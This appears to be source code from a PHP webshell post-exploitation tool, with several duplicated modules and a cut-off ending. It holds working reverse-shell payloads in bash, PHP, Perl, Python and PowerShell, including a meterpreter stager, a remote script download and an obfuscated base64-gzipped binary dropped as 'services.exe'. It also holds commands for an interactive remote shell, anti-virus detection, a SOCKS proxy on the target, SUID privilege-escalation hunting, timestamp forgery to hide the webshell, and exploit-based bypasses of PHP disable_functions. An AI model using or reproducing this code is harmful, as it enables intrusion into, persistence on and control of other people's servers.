def run(*commands):
"""
shell
Get a temporary shell of target system by system function or just run a shell command.
"""
command = str(value_translation(gget("raw_command_args")))
if (command):
res = send(get_system_code(command))
if (not res):
return
print(color.green("\nResult:\n\n") + res.r_text.strip() + "\n")
return
print(
color.cyan(
"Eenter interactive temporary shell...\n\nUse 'back' command to return doughnuts.\n"
))
res = send(
f'{get_system_code("whoami")}print("@".$_SERVER["SERVER_NAME"]."|".getcwd());'
).r_text.strip()
prompt, pwd = res.split("|")
set_namespace("webshell", False, True)
wordlist = gget("webshell.wordlist")
readline.set_wordlist(NEW_WINDOWS_WORDLIST if (
is_windows()) else NEW_UNIX_WORDLIST)
if is_windows():
prompt = "%s> "
else:
prompt = prompt.replace("\r", "").replace("\n", "") + ":%s$ "
try:
while gget("loop"):
print(prompt % pwd, end="")
command = str(value_translation(readline()))
lower_command = command.lower()
if (lower_command.lower() in ['exit', 'quit', 'back']):
print()
break
if (command == ''):
print()
continue
b64_pwd = base64_encode(pwd)
if (lower_command.startswith("cd ") and len(lower_command) > 3):
path = base64_encode(lower_command[3:].strip())
res = send(
f'chdir(base64_decode(\'{b64_pwd}\'));chdir(base64_decode(\'{path}\'));print(getcwd());'
)
if (not res):
return
pwd = res.r_text.strip()
else:
res = send(f'chdir(base64_decode(\'{b64_pwd}\'));' +
get_system_code(command))
if (not res):
return
print("\n" + res.r_text.strip() + "\n")
finally:
readline.set_wordlist(wordlist)
def run(find_path: str = "/usr&/bin"):
"""
av
(Only for windows) Detect anti-virus software running on the target system.
ps: Need to run system commands
Origin: https://github.com/BrownFly/findAV, https://github.com/gh0stkey/avList
"""
if (not is_windows()):
print(color.red("\nTarget system isn't windows\n"))
return
res = send(get_system_code("tasklist /svc"))
if (not res or not res.r_text
or "No system execute function" in res.r_text):
print(color.red("\nDetect error\n"))
return
with open(path.join(gget("root_path"), "auxiliary", "av", "av.json"),
"r",
encoding="utf-8") as f:
av_processes = loads(f.read())
flag = 0
print("\n" + color.green(" " * 37 + "Result"))
for line in res.r_text.split("\n"):
process = line.split(' ')[0]
if process in av_processes:
flag = 1
print(" %40s - %-30s" %
(color.cyan(process), color.yellow(av_processes[process])))
if (not flag):
print(" %40s / %-30s" %
(color.green('No anti-virus'), color.red('Not found')))
print()
def get_bash_cmd(ip: str, port: int):
bash = f"""bash -c '0<&159-;exec 159<>/dev/tcp/{ip}/{int(port)};sh <&159 >&159 2>&159' """
php = get_system_code(bash)
t = Thread(target=send, args=(php, ))
t.setDaemon(True)
t.start()
return t
def run(lhost: str,
port: int,
mode: int = 0,
fakename: str = "/usr/lib/systemd"):
"""
reshell
Bind a local port and wait for target connect back to get a full shell.
eg: reshell {lhost} {port} {type=[python|upload]{1|2},default = 0 (Python:1 Not Python:2)} {(Only for Mode 2) fakename=/usr/lib/systemd}
"""
if (is_windows(False) or is_windows()):
print(color.red(f"Only for both system is linux."))
return False
try:
port = int(port)
except ValueError:
port = 23333
disable_func_list = gget("webshell.disable_functions", "webshell")
MODE = 1
print(color.yellow(f"Waring: You are using a testing command...."))
print(color.yellow(f" Please make sure Port {port} open...."))
if (mode == 0):
if (has_env("python")):
print(color.green(f"Traget has python environment."))
MODE == 1
else:
print(color.red(f"Traget has not python environment."))
MODE == 2
else:
MODE = int(mode)
if ("proc_open" in disable_func_list):
print(color.red("proc_open is disabled... Try Mode 3"))
return
if (MODE == 1):
print(color.yellow(f"Use Mode 1->python"))
command = get_php(lhost, port)
else:
print(color.yellow(f"Use Mode 2->upload"))
filename = encrypt(f"{lhost}-{port}")
if not upload(
path.join(gget("root_path"), "auxiliary", "reshell",
"reverse_server_x86_64"), "/tmp/%s" % filename,
True):
return
command = get_system_code(
f"cd /tmp && chmod +x {filename} && ./{filename} {fakename}",
False)
t = Thread(target=delay_send, args=(2, command))
t.setDaemon(True)
t.start()
print(f"Bind port {color.yellow(str(port))}...")
if (not bind(port, MODE)):
print(color.red(f"Bind port error."))
if (MODE == 3):
res = send(f"unlink('/tmp/{filename}');")
if (not res):
return
def run():
"""
checkvm
Simply check whether the machine is a virtual machine.
"""
if (is_windows()):
commands = (get_system_code(
'Systeminfo | findstr /i "System Model"', True))
else:
commands = (get_system_code(each, True) for each in (
"dmidecode -s system-product-name", "lshw -class system", "dmesg | grep -i virtual", "lscpu"))
for command in commands:
result = send(command).r_text
if (any(vm in result for vm in type_vm)):
print(f"\nis VM: {color.green('True')}\n")
else:
print(f"\nis VM: {color.red('False')}\n")
def run(port: int = 8888):
"""
socks
(Only for *unix) Run a socks5 server on the target system by python.
eg: socks {port=8888}
"""
if (is_windows()):
print(color.red("Target system isn't *unix"))
return
flag = has_env("python")
if flag:
python = get_python(port)
pyname = "check.py"
res = send(
f"print(file_put_contents('/tmp/{pyname}', base64_decode(\"{base64_encode(python)}\")));"
)
if (not res):
return
text = res.r_text.strip()
if not len(text):
print(color.red("Failed to write file in /tmp directory."))
return
t = Thread(target=send,
args=(get_system_code(f"python /tmp/{pyname}"), ))
t.setDaemon(True)
t.start()
t2 = Thread(target=delay_send,
args=(
10.0,
f"unlink('/tmp/{pyname}');",
))
t2.setDaemon(True)
t2.start()
sleep(1)
if (t.isAlive()):
print(
f"\nStart socks5 server listen on {port} {color.green('success')}.\n"
)
else:
print(f"\nStart socks5 server {color.red('error')}.\n")
else:
print(
color.red(
"The target host does not exist or cannot be found in the python environment."
))
def run(find_path: str = "/usr&/bin"):
"""
priv
(Only for *unix) Find all files with suid belonging to root and try to get privilege escalation tips.
ps:use & to split find_path
eg: priv {find_path="/usr&/bin"}
"""
if (is_windows()):
print(color.red("\nTarget system isn't *unix\n"))
return
print(
color.yellow(
f"\nFinding all files with suid belonging to root in {find_path}...\n"
))
phpcode = ""
priv_tips = {}
if ("&" in find_path):
find_paths = find_path.split("&")
else:
find_paths = (find_path, )
for each in find_paths:
phpcode += get_system_code(
f"find {each} -user root -perm -4000 -type f 2>/dev/null")
res = send(phpcode)
if (not res):
return
suid_commands = res.r_text.strip().split("\n")
if (not suid_commands or "No system execute function" in suid_commands[0]):
print(color.red("\nFind error\n"))
return
with open(path.join(gget("root_path"), "auxiliary", "priv", "gtfo.json"),
"r") as f:
priv_tips = loads(f.read())
for cmd_path in suid_commands:
cmd = cmd_path.split("/")[-1]
if (cmd in priv_tips):
print(
color.yellow(cmd_path) +
f" ( https://gtfobins.github.io/gtfobins/{cmd}/ )\n")
for k, v in priv_tips[cmd].items():
info = '\n'.join(v)
print(f"""{color.cyan(k)}\n{color.green(info)}\n""")
def run(filename: str = ""):
"""
touch
Create an empty file or (Only for *unix) Specify a file whose modification time stamp is the same as a random file in the current directory.
eg: touch {filename=this_webshell}
"""
command = get_system_code("touch -r $reference $file", False)
res = send(get_php(filename, command))
if (not res):
return
text = res.r_text.strip()
if (match(r"\d+", text)):
print(color.green(f"\nSuccessfully created an empty file {filename}.\n"))
elif ("No system execute function!" in text):
print(color.red("\nall the system execute commands are disabled.\n"))
else:
print(color.green(f"\nModify time stamp {text} success.\n"))
def run(filename: str = ""):
"""
touch
(Only for *unix) Specify a file whose modification time stamp is the same as a random file in the current directory.
eg: touch {filename=this_webshell}
"""
if (is_windows()):
print(color.red("Target system is windows."))
return
try:
command = get_system_code("touch -r $reference $file", False)
res = send(get_php(filename, command))
if (not res):
return
reference = res.r_text.strip()
print(color.green(f"Modify time stamp {reference} success."))
except IndexError:
print(color.red("all the system execute commands are disabled."))
def get_python_meterpreter(ip: str, port: int):
python = """import socket,zlib,base64,struct,time
for x in range(10):
try:
s=socket.socket(2,socket.SOCK_STREAM)
s.connect(('""" + ip + """',""" + str(port) + """))
break
except:
time.sleep(5)
l=struct.unpack('>I',s.recv(4))[0]
d=s.recv(l)
while len(d)<l:
d+=s.recv(l-len(d))
exec(zlib.decompress(base64.b64decode(d)),{'s':s})
"""
execgo = f"""exec(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('{b64encode(python.encode("utf-8")).decode("utf-8")}')[0]))"""
php = get_system_code(f'python -c "{execgo}"')
t = Thread(target=send, args=(php, ))
t.setDaemon(True)
t.start()
return t
def get_reverse_php(ip: str, port: str, upload_path: str):
if (is_windows()):
filename = f"{upload_path}\\\\services.exe"
return """header('Content-type: text/plain');
$payload = "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";
$evalCode = gzinflate(base64_decode($payload));
file_put_contents("%s", $evalCode);
%s""" % (filename, get_system_code(f"{filename} {ip} {port}", False))
else:
return """ignore_user_abort(true);
ini_set("max_execution_time",0);
$ipaddr = "%s";
$port = "%s";
$descriptorspec = array(0 => array("pipe","r"),1 => array("pipe","w"),2 => array("pipe","w"));
$cwd = getcwd();
$msg = php_uname()."\\nTemporary shall\\n";
$type = True;
if(!in_array('proc_open', explode(',', ini_get('disable_functions')))){
$sock = fsockopen($ipaddr, $port);
$descriptorspec = array(
0 => $sock,
1 => $sock,
2 => $sock
);
$process = proc_open('/bin/sh', $descriptorspec, $pipes);
proc_close($process);
die();
}
else{
$env = array("path" => "/bin:/usr/bin:/usr/local/bin:/usr/local/sbin:/usr/sbin");
}
if(function_exists("fsockopen")) {
$sock = fsockopen($ipaddr,$port);
} else {
$sock = socket_create(AF_INET,SOCK_STREAM,SOL_TCP);
socket_connect($sock,$ipaddr,$port);
socket_write($sock,$msg);
$type = False;
}
fwrite($sock,$msg);
fwrite($sock,"[".getcwd()."]$ ");
while (True) {
if ($type == True){
$cmd = fread($sock,1024);
} else {
$cmd = socket_read($sock,1024);
}
if (substr($cmd,0,3) == "cd " and strlen($cmd) > 3) {
$cwd = trim(substr($cmd,3));
chdir($cwd);
$cwd = getcwd();
}
else if (trim(strtolower($cmd)) == "exit") {
break;
} else {
$process = proc_open($cmd,$descriptorspec,$pipes,$cwd,$env);
if (is_resource($process)) {
fwrite($pipes[0],$cmd);
fclose($pipes[0]);
$msg = stream_get_contents($pipes[1]);
if ($type == True){
fwrite($sock,$msg);
} else {
socket_write($sock,$msg,strlen($msg));
}
fclose($pipes[1]);
$msg = stream_get_contents($pipes[2]);
if ($type == True){
fwrite($sock,$msg);
} else {
socket_write($sock,$msg,strlen($msg));
}
fclose($pipes[2]);
proc_close($process);
}
}
fwrite($sock,"[".getcwd()."]$ ");
}
if ($type == True){
fclose($sock);
} else {socket_close($sock);
}""" % (ip, port)
def run(ip: str, port: str, reverse_type: str = "php"):
"""
reverse
reverse shell to a host from target system.
eg: reverse {ip} {port} {type=php}
reverse_type:
- bash
- php
- python
- powershell(ps)
- perl (only for *unix)
"""
reverse_type = str(reverse_type).lower()
upload_tmp_dir = gget("webshell.upload_tmp_dir", "webshell")
if reverse_type == "bash":
if (is_windows()):
print(color.red("Target system is windows"))
return
command = f"""bash -c 'bash -i >& /dev/tcp/{ip}/{port} 0>&1'"""
t = Thread(target=send, args=(get_system_code(command),))
t.setDaemon(True)
t.start()
elif reverse_type == "php":
php = get_reverse_php(ip, port, upload_tmp_dir)
t = Thread(target=send, args=(php,))
t.setDaemon(True)
t.start()
if (is_windows()):
t2 = Thread(target=delay_send, args=(
10.0, f"unlink('{upload_tmp_dir}\\\\services.exe');",))
t2.setDaemon(True)
t2.start()
elif reverse_type in ("powershell", "ps"):
command = '''IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/9a3c747bcf535ef82dc4c5c66aac36db47c2afde/Shells/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress %s -port %s''' % (ip, port)
command = f"powershell -nop -ep bypass -encodedcommand {base64_encode(command, encoding='utf-16le')}"
t = Thread(target=send, args=(get_system_code(command),))
t.setDaemon(True)
t.start()
elif reverse_type == "perl":
if (is_windows()):
print(color.red("Target system is windows"))
return
command = """perl -e 'use Socket;$i="%s";$p=%s;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'""" % (
ip, port)
t = Thread(target=send, args=(get_system_code(command),))
t.setDaemon(True)
t.start()
elif reverse_type == "python":
if has_env("python"):
t = Thread(target=send, args=(get_system_code(get_reverse_python(ip, port), False),))
t.setDaemon(True)
t.start()
else:
print(
color.red(
"The target host does not exist or cannot be found in the python environment."
)
)
return
else:
print(color.red("Reverse type Error."))
return
sleep(1)
if (t.isAlive()):
print(f"\nReverse shell to {ip}:{port} {color.green('success')}.\n")
else:
print(f"\nReverse shell {color.red('error')}.\n")
def run(mode: str = '0'):
"""
bdf
Try to bypass disable_functions by php7-backtrace-bypass.
Mode -1 / Mode close:
Close bdf
Mode auto:
Automatically filter and test all bdf modes
Mode 0:
Display the current bdf mode
Mode 1 php7-backtrace(Only for php7.0-7.4 and *unix) :
Origin:
- https://github.com/mm0r1/exploits/tree/master/php7-backtrace-bypass
Targets:
- 7.0 - all versions to date
- 7.1 - all versions to date
- 7.2 - all versions to date
- 7.3 < 7.3.15 (released 20 Feb 2020)
- 7.4 < 7.4.3 (released 20 Feb 2020)
Mode 2 php7-gc(Only for php7.0-7.3 and *unix) :
Origin:
- https://github.com/mm0r1/exploits/tree/master/php7-gc-bypass
Targets:
- 7.0 - all versions to date
- 7.1 - all versions to date
- 7.2 - all versions to date
- 7.3 - all versions to date
Mode 3 php7-json(Only for php7.1-7.3):
Origin:
- https://github.com/mm0r1/exploits/tree/master/php-json-bypass
Targets:
- 7.1 - all versions to date
- 7.2 < 7.2.19 (released 30 May 2019)
- 7.3 < 7.3.6 (released 30 May 2019)
Mode 4 LD_PRELOAD(Only for *unix):
Need:
- putenv, mail/error_log/mb_send_mail/imap_email fucntions enabled
Mode 5 FFI(Only for *unix and php >= 7.4):
Author:
- MorouU
Need:
- FFI extension
Mode 6 COM(Only for windows):
Need:
- com_dotnet extension
Mode 7 imap_open:
Need:
- imap extension
"""
if (mode == "close"):
mode = -1
if (mode == "auto"):
test_list = windows_test_list if is_windows() else linux_test_list
php_version = gget("webshell.php_version", "webshell")
if (not php_version.startswith("7.")):
test_list -= {1, 2, 3}
for test_mode in test_list:
print(f"Try Mode {test_mode} {mode_to_desc_dict[test_mode]}:")
if (set_mode(test_mode, True)):
res = send(
get_system_code("echo 6ac2ed344113c07c0028327388553273",
mode=test_mode))
if (res and "6ac2ed344113c07c0028327388553273" in res.r_text):
print(color.green("\n Success\n"))
print(
f"Set bypass disable_functions: {test_mode}-{mode_to_desc_dict[test_mode]}\n"
)
gset("webshell.bypass_df", test_mode, True, "webshell")
break
else:
print(color.red("\n Failed!\n"))
continue
else:
try:
mode = int(mode)
except ValueError:
print(color.red("\nMode error.\n"))
return
if (mode == 0):
print(
f"\nbypass disable_functions: {mode_to_desc_dict[gget('webshell.bypass_df', 'webshell')]}\n"
)
elif (mode in mode_to_desc_dict
and (mode not in mode_linux_set or not is_windows())):
set_mode(mode)
pass
else:
print(color.red("\nMode error.\n"))
def run(ip: str, port: str, reverse_type: str = "php"):
"""
reverse
reverse shell to a host from target system.
eg: reverse {ip} {port} {type=php}
"""
reverse_type = str(reverse_type).lower()
if reverse_type == "php":
php = get_reverse_php(ip, port)
t = Thread(target=send, args=(php, ))
t.setDaemon(True)
t.start()
elif reverse_type == "python":
if has_env("python"):
python = get_reverse_python(ip, port)
if is_windows():
pyname = "python-update.py"
upload_tmp_dir = gget("webshell.upload_tmp_dir", "webshell")
res = send(
f"print(file_put_contents('{upload_tmp_dir}{pyname}', \"{python}\"));"
)
if (not res):
return
text = res.r_text.strip()
if not len(text):
print(
color.red(
f"Failed to write file in {upload_tmp_dir if upload_tmp_dir else 'current'} directory."
))
return
t = Thread(target=send,
args=(get_system_code(
f"python {upload_tmp_dir}{pyname}", False), ))
t.setDaemon(True)
t.start()
t2 = Thread(target=delay_send,
args=(
10.0,
f"unlink('{upload_tmp_dir}{pyname}');",
))
t2.setDaemon(True)
t2.start()
else:
t = Thread(target=send,
args=(get_system_code(python, False), ))
t.setDaemon(True)
t.start()
else:
print(
color.red(
"The target host does not exist or cannot be found in the python environment."
))
return
else:
print(color.red("Reverse type Error."))
return
sleep(1)
if (t.isAlive()):
print(f"\nReverse shell to {ip}:{port} {color.green('success')}.\n")
else:
print(f"\nReverse shell {color.red('error')}.\n")
def run(mode: str = '0'):
"""
bdf
Try to bypass disable_functions by php7-backtrace-bypass.
Mode -1 / Mode close:
Close bdf
Mode auto:
Automatically filter and test all bdf modes
Mode 0:
Display the current bdf mode
Mode 1 php7-backtrace(Only for php7.0-7.4 and *unix) :
Origin:
- https://github.com/mm0r1/exploits/tree/master/php7-backtrace-bypass
Targets:
- 7.0 - all versions to date
- 7.1 - all versions to date
- 7.2 - all versions to date
- 7.3 < 7.3.15 (released 20 Feb 2020)
- 7.4 < 7.4.3 (released 20 Feb 2020)
Mode 2 php7-gc(Only for php7.0-7.3 and *unix) :
Origin:
- https://github.com/mm0r1/exploits/tree/master/php7-gc-bypass
Targets:
- 7.0 - all versions to date
- 7.1 - all versions to date
- 7.2 - all versions to date
- 7.3 - all versions to date
Mode 3 php7-json(Only for php7.1-7.3):
Origin:
- https://github.com/mm0r1/exploits/tree/master/php-json-bypass
Targets:
- 7.1 - all versions to date
- 7.2 < 7.2.19 (released 30 May 2019)
- 7.3 < 7.3.6 (released 30 May 2019)
Mode 4 LD_PRELOAD(Only for *unix):
Need:
- putenv, mail/error_log/mb_send_mail/imap_email fucntions
Mode 5 FFI(Only for *unix and php >= 7.4):
Author:
- MorouU
Need:
- FFI extension
Mode 6 COM(Only for windows):
Need:
- com_dotnet extension
Mode 7 imap_open:
Need:
- imap extension
Mode 8 MYSQL-UDF:
Need:
- db_init
- mysql >= 5.1
Mode 9 php7-splDoublyLinkedList:
Origin:
- https://www.freebuf.com/vuls/251017.html
Targets:
- 7.1 - all versions to date
- 7.2 - all versions to date
- 7.3 - all versions to date
- 7.4 < 7.4.11
Mode 10 php-fpm
Origin:
- https://xz.aliyun.com/t/5598
Need:
- php-fpm
- gopher: curl extension, fpm can access by http
- sock: stream_socket_client function, fpm can access by sock
- http_sock: fsockopen / pfsockopen function, fpm can access by http
Mode 11 apache-mod-cgi
Origin:
- https://github.com/l3m0n/Bypass_Disable_functions_Shell/blob/master/exp/apache_mod_cgi/exp.php
Need:
- apache_mod_cgi
- allow .htaccess
Mode 12 iconv
Origin:
- https://xz.aliyun.com/t/8669
Need:
- iconv extension
- putenv fucntions
"""
if (mode == "close"):
mode = -1
if (mode == "auto"):
test_list = windows_test_list if is_windows() else linux_test_list
php_version = gget("webshell.php_version", "webshell")
if (not php_version.startswith("7.")):
test_list -= {1, 2, 3, 9}
if (not gget("db_connected", "webshell")
